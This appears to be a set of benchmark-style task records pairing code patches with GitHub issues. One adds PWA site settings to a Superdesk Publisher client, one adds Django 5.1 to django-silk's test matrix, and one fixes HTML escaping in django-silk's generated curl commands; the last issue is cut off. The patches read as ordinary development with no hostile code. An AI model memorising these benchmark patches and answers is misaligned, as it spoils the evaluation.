* @description gets tenant name by its code
*/
getTenantOutputChannelNameByCode(code) {
- let tenant = this.sites.find(site => {
+ let tenant = this.sites.find((site) => {
return site.code == code;
});
@@ -1106,7 +1127,11 @@ export function WebPublisherSettingsController(
return site.code == code;
});
- return tenant ? tenant.subdomain + "." + tenant.domain_name : null;
+ return tenant
+ ? tenant.pwa_config && tenant.pwa_config.url
+ ? tenant.pwa_config.url
+ : tenant.subdomain + "." + tenant.domain_name
+ : null;
}
/**
@@ -1320,7 +1345,7 @@ export function WebPublisherSettingsController(
// organization rule
$scope.newRule.destinations = [];
- _.each($scope.newRule.configuration.destinations, destination => {
+ _.each($scope.newRule.configuration.destinations, (destination) => {
let tenant = this.sites.find(function (site) {
return site.code == destination.tenant;
});
@@ -1342,18 +1367,18 @@ export function WebPublisherSettingsController(
description: $scope.newRule.description,
priority: "1",
expression: "",
- configuration: []
+ configuration: [],
};
if ($scope.newRule.type == "organization") {
newRule.configuration.push({
key: "destinations",
- value: []
+ value: [],
});
- _.each($scope.newRule.destinations, destination => {
+ _.each($scope.newRule.destinations, (destination) => {
let configuration = {
- tenant: destination.code
+ tenant: destination.code,
};
newRule.configuration[0].value.push(configuration);
@@ -1365,7 +1390,7 @@ export function WebPublisherSettingsController(
if ($scope.newRule.action.route) {
newRule.configuration.push({
key: "route",
- value: $scope.newRule.action.route
+ value: $scope.newRule.action.route,
});
}
if ($scope.newRule.action.published) {
@@ -1414,10 +1439,7 @@ export function WebPublisherSettingsController(
}
});
}
- return _(newRule)
- .omitBy(_.isNil)
- .omitBy(_.isEmpty)
- .value();
+ return _(newRule).omitBy(_.isNil).omitBy(_.isEmpty).value();
}
/**
@@ -1436,7 +1458,7 @@ export function WebPublisherSettingsController(
_.pick(newRule, updatedKeys),
this.selectedRule.id
)
- .then(rule => {
+ .then((rule) => {
this.rulePaneOpen = false;
this.selectedRule = {};
this._refreshRules();
@@ -1445,7 +1467,7 @@ export function WebPublisherSettingsController(
publisher.setTenant($scope.newRule.action.tenant);
publisher
.manageTenantRule(_.pick(newRule, updatedKeys), this.selectedRule.id)
- .then(rule => {
+ .then((rule) => {
this.rulePaneOpen = false;
this.selectedRule = {};
this._refreshRules();
@@ -1472,7 +1494,7 @@ export function WebPublisherSettingsController(
sitesFilter(site) {
return $scope.newRule.destinations.find(
- destination => destination.code === site.code
+ (destination) => destination.code === site.code
)
? false
: true;
@@ -1498,7 +1520,7 @@ export function WebPublisherSettingsController(
_loadThemes() {
$scope.loading = true;
- return publisher.getOrganizationThemes().then(response => {
+ return publisher.getOrganizationThemes().then((response) => {
$scope.loading = false;
$scope.organizationThemes = response._embedded._items;
});
@@ -1514,11 +1536,11 @@ export function WebPublisherSettingsController(
$scope.loading = true;
return publisher
.querySites()
- .then(sites => {
+ .then((sites) => {
// assigning theme to site
- angular.forEach(sites, site => {
+ angular.forEach(sites, (site) => {
site.theme = $scope.organizationThemes.find(
- theme => site.theme_name == theme.name
+ (theme) => site.theme_name == theme.name
);
});
$scope.sites = sites;
@@ -1527,7 +1549,7 @@ export function WebPublisherSettingsController(
this.toggleInfoCarousel();
}
})
- .catch(err => {
+ .catch((err) => {
$scope.loading = false;
notify.error("Couldn't get list of tenants. Try again");
});
@@ -1540,22 +1562,22 @@ export function WebPublisherSettingsController(
* @description Loads theme settings
*/
_refreshThemeSettings() {
- return publisher.getThemeSettings().then(settings => {
+ return publisher.getThemeSettings().then((settings) => {
this.themeSettings = {};
this.themeSettings.theme_logo = _.find(settings, {
- name: "theme_logo"
+ name: "theme_logo",
});
this.themeSettings.theme_logo_second = _.find(settings, {
- name: "theme_logo_second"
+ name: "theme_logo_second",
});
this.themeSettings.theme_logo_third = _.find(settings, {
- name: "theme_logo_third"
+ name: "theme_logo_third",
});
- _.remove(settings, setting => {
+ _.remove(settings, (setting) => {
return setting.name.includes("theme_logo") ? true : false;
});
// little hack to make ng-select work properly
- this.themeSettings.settings = settings.map(setting => {
+ this.themeSettings.settings = settings.map((setting) => {
if (setting.options) {
setting.value = setting.value.toString();
}
@@ -1584,10 +1606,12 @@ export function WebPublisherSettingsController(
* @description Loads Organization Rules
*/
_loadOrganizationRules() {
- return publisher.queryOrganizationRules({ limit: 99999 }).then(rules => {
- this.organizationRules = rules;
- return rules;
- });
+ return publisher
+ .queryOrganizationRules({ limit: 99999 })
+ .then((rules) => {
+ this.organizationRules = rules;
+ return rules;
+ });
}
/**
@@ -1599,8 +1623,8 @@ export function WebPublisherSettingsController(
this.tenantsRules = {};
// tenants configured with organization rules
this.availableTenants = [];
- _.each(this.organizationRules, rule => {
- _.each(rule.configuration.destinations, dest => {
+ _.each(this.organizationRules, (rule) => {
+ _.each(rule.configuration.destinations, (dest) => {
let tenant = this.sites.find(function (site) {
return site.code == dest.tenant;
});
@@ -1608,7 +1632,7 @@ export function WebPublisherSettingsController(
if (tenant) {
publisher.setTenant(tenant);
this.availableTenants.push(tenant);
- this._loadTenantRules().then(rules => {
+ this._loadTenantRules().then((rules) => {
this.tenantsRules[tenant.code] = rules;
});
}
@@ -1622,16 +1646,16 @@ export function WebPublisherSettingsController(
* @description Loads Tenant Rules
*/
_loadTenantRules() {
- return publisher.queryTenantRules({ limit: 99999 }).then(rules => {
+ return publisher.queryTenantRules({ limit: 99999 }).then((rules) => {
return rules;
});
}
/**
- * @ngdoc method
- * @name WebPublisherSettingsController#_loadIngestSources
- * @description Loads ingest sources
- */
+ * @ngdoc method
+ * @name WebPublisherSettingsController#_loadIngestSources
+ * @description Loads ingest sources
+ */
_loadIngestSources = (page = 1) => {
api.ingestProviders
.query({ max_results: 200, page: page })
@@ -1639,12 +1663,10 @@ export function WebPublisherSettingsController(
let ingestSources = response._items;
if (ingestSources.length) {
- this.ingestSources = [...this.ingestSources, ...ingestSources]
+ this.ingestSources = [...this.ingestSources, ...ingestSources];
}
if (response._links.next) this._loadIngestSources(page + 1);
-
-
});
};
@@ -1658,18 +1680,24 @@ export function WebPublisherSettingsController(
this.expressionBuilder = {
operators: {
- string: [{ name: "=", value: "==" }, { name: "!=", value: "!=" }],
+ string: [
+ { name: "=", value: "==" },
+ { name: "!=", value: "!=" },
+ ],
number: [
{ name: "=", value: "==" },
{ name: "!=", value: "!=" },
{ name: "<", value: "<" },
{ name: ">", value: ">" },
{ name: "<=", value: "<=" },
- { name: ">=", value: ">=" }
+ { name: ">=", value: ">=" },
],
in: [{ name: "=", value: "in" }],
- custom: [{ name: "=", value: "==" }, { name: "!=", value: "!=" }]
- }
+ custom: [
+ { name: "=", value: "==" },
+ { name: "!=", value: "!=" },
+ ],
+ },
};
if ($scope.newRule.type == "organization") {
@@ -1680,10 +1708,10 @@ export function WebPublisherSettingsController(
{
name: "Ingest Source",
value: "package.getSource()",
- type: "string"
+ type: "string",
},
{ name: "Priority", value: "package.getPriority()", type: "number" },
- { name: "Urgency", value: "package.getUrgency()", type: "number" }
+ { name: "Urgency", value: "package.getUrgency()", type: "number" },
];
} else {
// article
@@ -1694,29 +1722,29 @@ export function WebPublisherSettingsController(
{
name: "Category",
value: "article.getPackage().getServicesNames()",
- type: "in"
+ type: "in",
},
{ name: "Author", value: "article.getAuthorsNames()", type: "in" },
{
name: "Ingest Source",
value: "article.getPackage().getSource()",
- type: "string"
+ type: "string",
},
{
name: "Priority",
value: "article.getPackage().getPriority()",
- type: "number"
+ type: "number",
},
{
name: "Urgency",
value: "article.getPackage().getUrgency()",
- type: "number"
- }
+ type: "number",
+ },
];
}
- vocabularies.getAllActiveVocabularies().then(result => {
- result.forEach(vocabulary => {
+ vocabularies.getAllActiveVocabularies().then((result) => {
+ result.forEach((vocabulary) => {
if (vocabulary._id === "categories") {
this.expressionBuilder.categories = vocabulary.items;
}
@@ -1725,7 +1753,7 @@ export function WebPublisherSettingsController(
name: vocabulary.display_name,
value:
customRuleFunctionName + "['" + vocabulary.display_name + "']",
- type: "custom"
+ type: "custom",
});
}
});
diff --git a/client/directives/siteWizard/SiteWizardDirective.js b/client/directives/siteWizard/SiteWizardDirective.js
index 3c483493..edab1da7 100644
--- a/client/directives/siteWizard/SiteWizardDirective.js
+++ b/client/directives/siteWizard/SiteWizardDirective.js
@@ -12,7 +12,7 @@ export function SiteWizardDirective(publisher, WizardHandler) {
this.scope = {
active: "=active",
managerController: "=managerController",
- outputChannelType: "=outputChannelType"
+ outputChannelType: "=outputChannelType",
};
this.template = require("./wizard.html");
}
@@ -28,18 +28,24 @@ export function SiteWizardDirective(publisher, WizardHandler) {
busy: false,
errorMessage: null,
site: null,
- ready: false
+ ready: false,
};
scope.newSite = {};
if (scope.outputChannelType) {
- scope.newSite.output_channel = {
- type: scope.output_channelType.toLowerCase(),
- config: {
+ if (scope.outputChannelType === "PWA") {
+ scope.newSite.pwa_config = {
url: "",
- authorization_key: ""
- }
- };
+ };
+ } else {
+ scope.newSite.output_channel = {
+ type: scope.outputChannelType.toLowerCase(),
+ config: {
+ url: "",
+ authorization_key: "",
+ },
+ };
+ }
}
};
@@ -69,7 +75,7 @@ export function SiteWizardDirective(publisher, WizardHandler) {
scope.wizard.busy = true;
let newUrl = scope.newSite.subdomain + "." + scope.newSite.domain_name;
- publisher.checkIfPublisher(newUrl).then(isPublisher => {
+ publisher.checkIfPublisher(newUrl).then((isPublisher) => {
if (!isPublisher) {
scope.wizard.busy = false;
scope.wizard.errorMessage =
@@ -79,7 +85,7 @@ export function SiteWizardDirective(publisher, WizardHandler) {
publisher
.manageSite(scope.newSite)
- .then(site => {
+ .then((site) => {
scope.wizard.errorMessage = false;
scope.wizard.site = site;
publisher.setTenant(site);
@@ -91,7 +97,7 @@ export function SiteWizardDirective(publisher, WizardHandler) {
WizardHandler.wizard("siteWizard").next();
}
})
- .catch(error => {
+ .catch((error) => {
scope.wizard.busy = false;
if (error.status === 409) {
scope.wizard.errorMessage = "Site already exists";
diff --git a/client/directives/siteWizard/wizard.html b/client/directives/siteWizard/wizard.html
index 19ebfe3d..2e787b1a 100644
--- a/client/directives/siteWizard/wizard.html
+++ b/client/directives/siteWizard/wizard.html
@@ -6,11 +6,8 @@
<h3 class="modal__heading" translate>
Create Site Wizard
<span ng-if="newSite.output_channel"
- >-
- {{
- newSite.output_channel.type.charAt(0).toUpperCase() +
- newSite.output_channel.type.slice(1)
- }}</span
+ >- {{ newSite.output_channel.type.charAt(0).toUpperCase() +
+ newSite.output_channel.type.slice(1) }}</span
>
</h3>
</div>
@@ -36,7 +33,10 @@ <h3 class="modal__heading" translate>
{{ wizard.errorMessage }}
</div>
<fieldset>
- <div ng-if="newSite.output_channel" class="form__row form__row--flex">
+ <div
+ ng-if="newSite.output_channel || newSite.pwa_config"
+ class="form__row form__row--flex"
+ >
<h4 class="text--light text--thin text--uppercase">
Superdesk Publisher tenant settings
</h4>
@@ -101,9 +101,9 @@ <h4 class="text--light text--thin text--uppercase">
>
<div class="form__row-item">
<div class="sd-line-input sd-line-input--required">
- <label class="sd-line-input__label" translate>{{
- name.replace("_", " ")
- }}</label>
+ <label class="sd-line-input__label" translate
+ >{{ name.replace("_", " ") }}</label
+ >
<input
class="sd-line-input__input"
type="text"
@@ -113,6 +113,30 @@ <h4 class="text--light text--thin text--uppercase">
</div>
</div>
</div>
+
+ <div ng-if="newSite.pwa_config" class="form__row form__row--flex">
+ <h4 class="text--light text--thin text--uppercase">PWA settings</h4>
+ </div>
+ <div
+ class="form__row form__row--flex"
+ ng-if="newSite.pwa_config"
+ ng-repeat="(name, value) in newSite.pwa_config"
+ >
+ <div class="form__row-item">
+ <div class="sd-line-input sd-line-input--required">
+ <label class="sd-line-input__label" translate
+ >{{ name.replace("_", " ") }}</label
+ >
+ <input
+ class="sd-line-input__input"
+ type="text"
+ ng-model="newSite.pwa_config[name]"
+ placeholder="{{name === 'url' ? 'https://website.com' : null}}"
+ required
+ />
+ </div>
+ </div>
+ </div>
</fieldset>
</form>
@@ -157,7 +181,7 @@ <h4 class="text--light text--thin text--uppercase">
Configure your site
</button>
<button
- class="btn btn--hollow btn--primary"
+ class="btn btn--hollow btn--primary"
ng-disabled="!wizard.ready"
ng-click="managerController.toggleSiteWizard()"
>
diff --git a/client/images/PWA_logo.svg b/client/images/PWA_logo.svg
new file mode 100644
index 00000000..d931c172
--- /dev/null
+++ b/client/images/PWA_logo.svg
@@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg width="100%" height="100%" viewBox="0 0 978 388" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve" xmlns:serif="http://www.serif.com/" style="fill-rule:evenodd;clip-rule:evenodd;stroke-linejoin:round;stroke-miterlimit:2;">
+ <g transform="matrix(7.83465,0,0,7.83465,-398.586,-488.321)">
+ <path d="M142.662,103.442L146.265,94.331L156.668,94.331L151.73,80.51L157.905,64.896L175.59,111.852L162.548,111.852L159.526,103.442L142.662,103.442Z" style="fill-opacity:0.91;fill-rule:nonzero;"/>
+ </g>
+ <g transform="matrix(7.83465,0,0,7.83465,-398.586,-488.321)">
+ <path d="M131.535,109.284L150.467,62.328L137.916,62.329L124.965,92.673L115.755,62.329L106.108,62.329L96.22,92.673L89.246,78.845L82.935,98.288L89.343,109.284L101.695,109.284L110.631,82.072L119.15,109.284L131.535,109.284Z" style="fill-opacity:0.91;fill-rule:nonzero;" fill="#3d8fb1"/>
+ </g>
+ <g transform="matrix(7.83465,0,0,7.83465,-398.586,-488.321)">
+ <path d="M62.789,93.166L70.52,93.166C72.862,93.166 74.947,92.905 76.776,92.382L78.775,86.223L84.363,69.007C83.938,68.333 83.452,67.694 82.905,67.093C80.036,63.917 75.838,62.33 70.312,62.33L50.875,62.33L50.875,109.286L62.789,109.286L62.789,93.166ZM73.022,73.132C74.143,74.26 74.703,75.77 74.703,77.66C74.703,79.566 74.21,81.077 73.225,82.194C72.144,83.435 70.155,84.056 67.257,84.056L62.789,84.056L62.789,71.441L67.29,71.441C69.991,71.441 71.902,72.004 73.022,73.132Z" style="fill-opacity:0.91;fill-rule:nonzero;"/>
+ </g>
+</svg>
diff --git a/client/styles/_publisher.scss b/client/styles/_publisher.scss
index 2ed6803b..78639e0c 100644
--- a/client/styles/_publisher.scss
+++ b/client/styles/_publisher.scss
@@ -23,10 +23,10 @@
.modal--kindafullscreen {
position: fixed;
- left: 48px;
- right: 0px;
- top: 49px;
- bottom: 32px;
+ left: 50px !important;
+ right: 0px !important;
+ top: 40px !important;
+ bottom: 25px !important;
align-items: flex-start;
flex-direction: column;
overflow: hidden;
@@ -35,15 +35,15 @@
}
.modal--kindafullscreen .modal__dialog {
- width: 100%;
- height: 100%;
- max-width: 100%;
+ width: 100% !important;
+ height: 100% !important;
+ max-width: 100% !important;
}
.modal--kindafullscreen .modal__content {
margin: 0;
}
.modal--kindafullscreen .modal__content .modal__body {
- max-width: 100%;
+ max-width: 100% !important;
}
.listLimitNotification {
diff --git a/client/styles/articlePreview.scss b/client/styles/articlePreview.scss
index 46e7a39a..3570d186 100644
--- a/client/styles/articlePreview.scss
+++ b/client/styles/articlePreview.scss
@@ -1,95 +1,129 @@
.articlePreview {
- display: flex;
-
- &__iframe {
- margin: auto;
- width: 100%;
- height: calc(100vh - 88px);
- background-color: $white;
- border: 1px solid #e0e0e0;
- box-shadow: 0 0 12px rgba(0,0,0,0.1);
-
- &--tablet {
- width: 768px;
- height: 1024px;
- }
-
- &--tabletLandscape {
- width: 1024px;
- height: 768px;
- }
-
- &--mobile {
- width: 320px;
- height: 640px;
- }
-
- &--mobileLandscape {
- width: 640px;
- height: 320px;
- }
- }
-}
+ display: flex;
-.previewIcon {
- display: inline-block;
- background-position: bottom center;
- background-repeat: no-repeat;
- height: 32px;
- width: 32px;
- opacity: 0.25;
-
- &--desktop {
- background-image: url(../images/icon-desktop.svg);
- }
+ &__iframe {
+ margin: auto;
+ width: 100%;
+ height: calc(100vh - 88px);
+ background-color: $white;
+ border: 1px solid #e0e0e0;
+ box-shadow: 0 0 12px rgba(0, 0, 0, 0.1);
&--tablet {
- background-image: url(../images/icon-tablet.svg);
- width: 26px;
- margin-left: 15px;
+ width: 768px;
+ height: 1024px;
}
&--tabletLandscape {
- background-image: url(../images/icon-tablet-lands.svg);
+ width: 1024px;
+ height: 768px;
}
&--mobile {
- background-image: url(../images/icon-mobile.svg);
- width: 16px;
- margin-left: 10px;
+ width: 320px;
+ height: 640px;
}
&--mobileLandscape {
- background-image: url(../images/icon-mobile-lands.svg);
+ width: 640px;
+ height: 320px;
}
+ }
+}
- &--amp {
- background-image: url(../images/icon-amp-port.svg);
- margin-left: 10px;
- }
+.previewIcon {
+ display: inline-block;
+ background-position: bottom center;
+ background-repeat: no-repeat;
+ height: 32px;
+ width: 32px;
+ opacity: 0.25;
- &--ampLandscape {
- background-image: url(../images/icon-amp-land.svg);
- }
+ &--desktop {
+ background-image: url(../images/icon-desktop.svg);
+ }
- &--active {
- opacity: 0.8;
- }
+ &--tablet {
+ background-image: url(../images/icon-tablet.svg);
+ width: 26px;
+ margin-left: 15px;
+ }
+
+ &--tabletLandscape {
+ background-image: url(../images/icon-tablet-lands.svg);
+ }
+
+ &--mobile {
+ background-image: url(../images/icon-mobile.svg);
+ width: 16px;
+ margin-left: 10px;
+ }
+
+ &--mobileLandscape {
+ background-image: url(../images/icon-mobile-lands.svg);
+ }
+
+ &--amp {
+ background-image: url(../images/icon-amp-port.svg);
+ margin-left: 10px;
+ }
+
+ &--ampLandscape {
+ background-image: url(../images/icon-amp-land.svg);
+ }
+
+ &--active {
+ opacity: 0.8;
+ }
}
// Font size fix
.side-panel__content-block-text p {
- font-size: 1.5rem;
- line-height: 140%;
- font-weight: 300;
- word-wrap: break-word;
- padding-bottom: 1rem;
+ font-size: 1.5rem;
+ line-height: 140%;
+ font-weight: 300;
+ word-wrap: break-word;
+ padding-bottom: 1rem;
}
// Side panel embed width
.side-panel__content-block {
- .embed-block {
- iframe {
- width: 100%;
- }
+ .embed-block {
+ iframe {
+ width: 100%;
+ }
+ }
+}
+
+// typography stuff in preview pane
+.side-panel__content-block-text {
+ ul {
+ list-style-type: revert;
+ margin: revert;
+ padding: revert;
+ }
+
+ blockquote {
+ font-size: 14px;
+ line-height: 140%;
+ margin: 16px 0;
+ border-left: 3px solid rgba(160, 160, 160, 0.5);
+ padding: 4px 0 4px 14px;
+ font-style: italic;
+ }
+
+ table {
+ width: 100%;
+ border-collapse: collapse;
+ resize: both;
+ table-layout: auto;
+ border: 1px solid #dadada;
+ margin: 16px 0;
+
+ td {
+ border: 1px solid #dadada;
+ padding: 5px 8px;
+ font-size: 14px;
+ font-weight: 300;
}
+ }
}
diff --git a/client/styles/helperElements.scss b/client/styles/helperElements.scss
index f73f5dea..d9dfd0a3 100644
--- a/client/styles/helperElements.scss
+++ b/client/styles/helperElements.scss
@@ -8,6 +8,15 @@
no-repeat;
}
+.sp-logo-pwa {
+ display: block;
+ float: right;
+ margin-right: 1rem;
+ width: 50px;
+ height: 30px;
+ background: transparent url(../images/PWA_logo.svg) center center no-repeat;
+}
+
.absPosition {
position: absolute;
diff --git a/client/views/settings/website-management/manage-general.html b/client/views/settings/website-management/manage-general.html
index 277f2d27..759cb3cc 100644
--- a/client/views/settings/website-management/manage-general.html
+++ b/client/views/settings/website-management/manage-general.html
@@ -46,8 +46,7 @@
class="dropdown__toggle line-input"
ng-model="newSite.default_language"
ng-options="lang.qcode as lang.name for lang in webPublisherSettings.languages"
- >
- </select>
+ ></select>
</div>
</div>
<div class="form__row">
@@ -139,5 +138,26 @@ <h4 class="text--light text--uppercase">
</div>
</div>
</div>
+ <div ng-if="newSite.pwa_config && newSite.pwa_config.url">
+ <div class="form__row">
+ <h4 class="text--light text--uppercase">PWA settings</h4>
+ </div>
+ <div class="form__row" ng-repeat="(name, value) in newSite.pwa_config">
+ <div class="form__row-item">
+ <div class="sd-line-input sd-line-input--required">
+ <label class="sd-line-input__label" translate
+ >{{name.replace('_', ' ')}}</label
+ >
+ <input
+ class="sd-line-input__input"
+ type="text"
+ ng-model="newSite.pwa_config[name]"
+ placeholder="{{name === 'url' ? 'https://website.com' : null}}"
+ required
+ />
+ </div>
+ </div>
+ </div>
+ </div>
</form>
</div>
diff --git a/client/views/settings/website-management/manage.html b/client/views/settings/website-management/manage.html
index 832a0988..c47c710c 100644
--- a/client/views/settings/website-management/manage.html
+++ b/client/views/settings/website-management/manage.html
@@ -11,7 +11,7 @@ <h3 class="subnav__page-title">{{webPublisherSettings.selectedSite.name}}</h3>
<a
class="btn btn--text-only"
target="_blank"
- ng-href="{{webPublisherSettings.selectedSite.subdomain ? 'http://' + webPublisherSettings.selectedSite.subdomain + '.' + webPublisherSettings.selectedSite.domain_name: 'http://' + webPublisherSettings.selectedSite.domain_name}}"
+ ng-href="{{webPublisherSettings.selectedSite.pwa_config && webPublisherSettings.selectedSite.pwa_config.url ? webPublisherSettings.selectedSite.pwa_config.url : webPublisherSettings.selectedSite.subdomain ? 'http://' + webPublisherSettings.selectedSite.subdomain + '.' + webPublisherSettings.selectedSite.domain_name: 'http://' + webPublisherSettings.selectedSite.domain_name}}"
>
<i class="icon-globe"></i> Open website
</a>
diff --git a/client/views/settings/website-management/partials/routes-tree.html b/client/views/settings/website-management/partials/routes-tree.html
index 15b1a6f1..f162a269 100644
--- a/client/views/settings/website-management/partials/routes-tree.html
+++ b/client/views/settings/website-management/partials/routes-tree.html
@@ -26,14 +26,16 @@
</div>
<div class="listElement__right">
<span
- sd-tooltip="This route is redirected"
+ sd-tooltip="This route is redirected to {{route.redirect_route.route_target.name}}"
flow="left"
- ng-if="route.redirect"
- ><i class="icon-random"></i
- ></span>
+ ng-if="route.redirect_route"
+ >
+ <i class="icon-random"></i>
+ </span>
<span sd-tooltip="Paywall secured" flow="left" ng-if="route.paywall_secured"
><i class="icon-paywall icon--orange icon--full-opacity"></i
></span>
+
<div class="dropdown dropdown--align-right" dropdown>
<button class="dropdown__toggle dropdown--toggle" dropdown__toggle>
<i class="icon-dots-vertical"></i>
diff --git a/client/views/settings/website-management/partials/tenant.html b/client/views/settings/website-management/partials/tenant.html
index 3383eedf..89cdb9b2 100644
--- a/client/views/settings/website-management/partials/tenant.html
+++ b/client/views/settings/website-management/partials/tenant.html
@@ -2,7 +2,7 @@
<h3 class="sd-grid-item-header__heading sd-overflow-ellipsis">
<a
target="_blank"
- ng-href="{{site.output_channel ? site.output_channel.config.url : site.subdomain ? 'http://' + site.subdomain + '.' + site.domain_name: 'http://' + site.domain_name}}"
+ ng-href="{{site.pwa_config && site.pwa_config.url ? site.pwa_config.url: site.output_channel ? site.output_channel.config.url : site.subdomain ? 'http://' + site.subdomain + '.' + site.domain_name: 'http://' + site.domain_name}}"
flow="down"
>
<span>{{ site.name }}</span><i class="icon-external"></i>
@@ -28,17 +28,27 @@ <h3 class="sd-grid-item-header__heading sd-overflow-ellipsis">
</div>
<div class="sd-card sd-card--flex-grow">
<div class="dashboard-content-header sd-shadow--z1">
- <div class="dashboard-thumbnail-block">
+ <div
+ class="dashboard-thumbnail-block"
+ ng-if="site.pwa_config && site.pwa_config.url"
+ >
+ <span class="sp-logo-pwa" style="width: 100px; height: 62px"></span>
+ </div>
+ <div
+ class="dashboard-thumbnail-block"
+ ng-if="!site.pwa_config || !site.pwa_config.url"
+ >
<div class="dashboard-thumbnail-block__image">
<img
ng-if="!site.theme.screenshots[0] || !site.theme.screenshots[0].url"
src="../../../../directives/themeManager/no-theme-preview.png"
- style="max-width:140px; max-height: 60px"
+ style="max-width: 140px; max-height: 60px"
/>
+
<img
ng-if="site.theme.screenshots[0] && site.theme.screenshots[0].url"
ng-src="{{site.theme.screenshots[0].url}}"
- style="max-width:140px; max-height: 60px"
+ style="max-width: 140px; max-height: 60px"
/>
</div>
<div class="dashboard-thumbnail-block__meta">
diff --git a/client/views/settings/website-management/route-form.html b/client/views/settings/website-management/route-form.html
index a02e43cf..691d5a87 100644
--- a/client/views/settings/website-management/route-form.html
+++ b/client/views/settings/website-management/route-form.html
@@ -22,10 +22,11 @@
<div class="side-panel__content">
<div class="side-panel__content-block">
- <div class="sd-alert sd-alert--hollow" ng-if="newRoute.redirect">
+ <div class="sd-alert sd-alert--hollow" ng-if="newRoute.redirect_route">
<Icon name="random" />
<p className="sd-margin-l--1">
- This Route has redirect set to another Route. Details on:
+ This Route has redirect set to
+ {{newRoute.redirect_route.route_target.name}}. Details on:
<a
className="text-link"
href=""
@@ -89,7 +90,7 @@
id="routeParent"
class="dropdown__toggle line-input"
ng-model="newRoute.parent"
- ng-options="route.id as route.name for route in routes.children | filter: {id: newRoute.id ? '!' + newRoute.id : ''}"
+ ng-options="route.id as route.name for route in routes_flat | filter: {id: newRoute.id ? '!' + newRoute.id : ''}"
>
<option value=""></option>
</select>
diff --git a/client/views/settings/website-management/tenant-list.html b/client/views/settings/website-management/tenant-list.html
index cb44ed4c..e49efd54 100644
--- a/client/views/settings/website-management/tenant-list.html
+++ b/client/views/settings/website-management/tenant-list.html
@@ -21,6 +21,11 @@ <h2 class="sd-page__page-heading sd-margin-r--5">Website Management</h2>
Superdesk Publisher
</button>
</li>
+ <li>
+ <button ng-click="webPublisherSettings.toggleSiteWizard('PWA')">
+ PWA
+ </button>
+ </li>
<li>
<button ng-click="webPublisherSettings.toggleSiteWizard('Wordpress')">
Wordpress
@@ -33,7 +38,7 @@ <h2 class="sd-page__page-heading sd-margin-r--5">Website Management</h2>
<div class="sd-loader" ng-if="loading"></div>
<a
class="btn btn--sd-green btn--icon-only-circle btn--large sd-shadow--z4 fixedPosition fixedPosition--bottomRight"
- style="z-index:1"
+ style="z-index: 1"
ng-click="webPublisherSettings.toggleInfoCarousel()"
><i class="icon-info-large"></i
></a>
diff --git a/package.json b/package.json
index e71ed21a..4948f1cf 100644
--- a/package.json
+++ b/package.json
@@ -42,8 +42,10 @@
"react-beautiful-dnd": "^13.0.0",
"react-infinite-scroll-component": "^5.0.4",
"react-select": "^3.0.4",
+ "react": "16.9.0",
+ "react-dom": "16.9.0",
"react-virtualized": "^9.22.2",
- "superdesk-ui-framework": "^2.3.4"
+ "superdesk-ui-framework": "^2.3.8"
},
"devDependencies": {
"@babel/plugin-proposal-class-properties": "^7.4.4",
@@ -61,7 +63,7 @@
"jest-dom": "^3.4.0",
"jest-transform-css": "^2.0.0",
"superdesk-code-style": "^1.0.0",
- "superdesk-core": "superdesk/superdesk-client-core#9242566",
+ "superdesk-core": "superdesk/superdesk-client-core",
"wait-for-expect": "^1.2.0"
}
}
| make sure that tenant is reset
| 2021-06-18T08:53:31 | 0.0 | [] | [] |
|||
jazzband/django-silk | jazzband__django-silk-732 | dfb2826f1c76f6afa0c970bcc1b885db7507971e | diff --git a/tox.ini b/tox.ini
index 377fd94f..9da52bf8 100644
--- a/tox.ini
+++ b/tox.ini
@@ -11,13 +11,14 @@ DJANGO =
3.2: dj32
4.2: dj42
5.0: dj50
+ 5.1: dj51
main: djmain
[tox]
envlist =
py{38,39,310}-dj32-{sqlite3,mysql,postgresql}
- py{38,39,310,311}-dj{41,42,50,main}-{sqlite3,mysql,postgresql}
- py312-dj{42,50,main}-{sqlite3,mysql,postgresql}
+ py{38,39,310,311,312}-dj42-{sqlite3,mysql,postgresql}
+ py{310,311,312}-dj{50,51,main}-{sqlite3,mysql,postgresql}
[testenv]
usedevelop = True
@@ -31,6 +32,7 @@ deps =
dj32: django>=3.2,<3.3
dj42: django>=4.2,<4.3
dj50: django>=5.0,<5.1
+ dj51: django>=5.1,<5.2
djmain: https://github.com/django/django/archive/main.tar.gz
py312: setuptools
setenv =
| Explicitly test against Django 5.1
Currently there are tests against Django 5.0 and `main` but failures against `main` are ignored: https://github.com/albertyw/django-silk/blob/master/tox.ini#L24-L25
There should explicitly be non-ignored tests against Django 5.1 for as long as it is supported.
| 2024-08-16T04:35:19 | 0.0 | [] | [] |
|||
jazzband/django-silk | jazzband__django-silk-709 | 1cb46236b85f2f0b83296a02b64e9fc5f9021247 | diff --git a/silk/code_generation/curl.py b/silk/code_generation/curl.py
index 1181a92d..db135911 100644
--- a/silk/code_generation/curl.py
+++ b/silk/code_generation/curl.py
@@ -3,7 +3,7 @@
from django.template import Context, Template
-curl_template = """
+curl_template = """\
curl {% if method %}-X {{ method }}{% endif %}
{% if content_type %}-H 'content-type: {{ content_type }}'{% endif %}
{% if modifier %}{{ modifier }} {% endif %}{% if body %}'{{ body }}'{% endif %}
@@ -66,4 +66,4 @@ def curl_cmd(url, method=None, query_params=None, body=None, content_type=None):
'content_type': content_type,
'extra': extra,
}
- return t.render(Context(context)).replace('\n', ' ')
+ return t.render(Context(context, autoescape=False)).replace('\n', ' ')
| Curl and Django Test Client URL parameters are being url encoded
Curl and Django Test Client URL parameters are being rendered in encoded form.
Example:
Curl:
```bash
curl -X GET http://localhost:5000/px/?c=227cd4d894c7deb&rid=8bf881e6-93da-48c2-9c04-fbc55210708e&ccuid=a2696ad5-6610-4e1e-8e9f-c95174ea3c56
# EXPECTED
curl -X GET http://localhost:5000/px/?c=227cd4d894c7deb&rid=8bf881e6-93da-48c2-9c04-fbc55210708e&ccuid=a2696ad5-6610-4e1e-8e9f-c95174ea3c560000
```
Django Test Client section:
```python
from django.test import Client
c = Client()
response = c.get(path='/px/',
data={& # x27;c': '227cd4d894c7deb', 'rid': '8bf881e6-93da-48c2-9c04-fbc55210708e', 'ccuid': 'a2696ad5-6610-4e1e-8e9f-c95174ea3c56'})
# EXPECTED:
response = c.get(path='/px/',
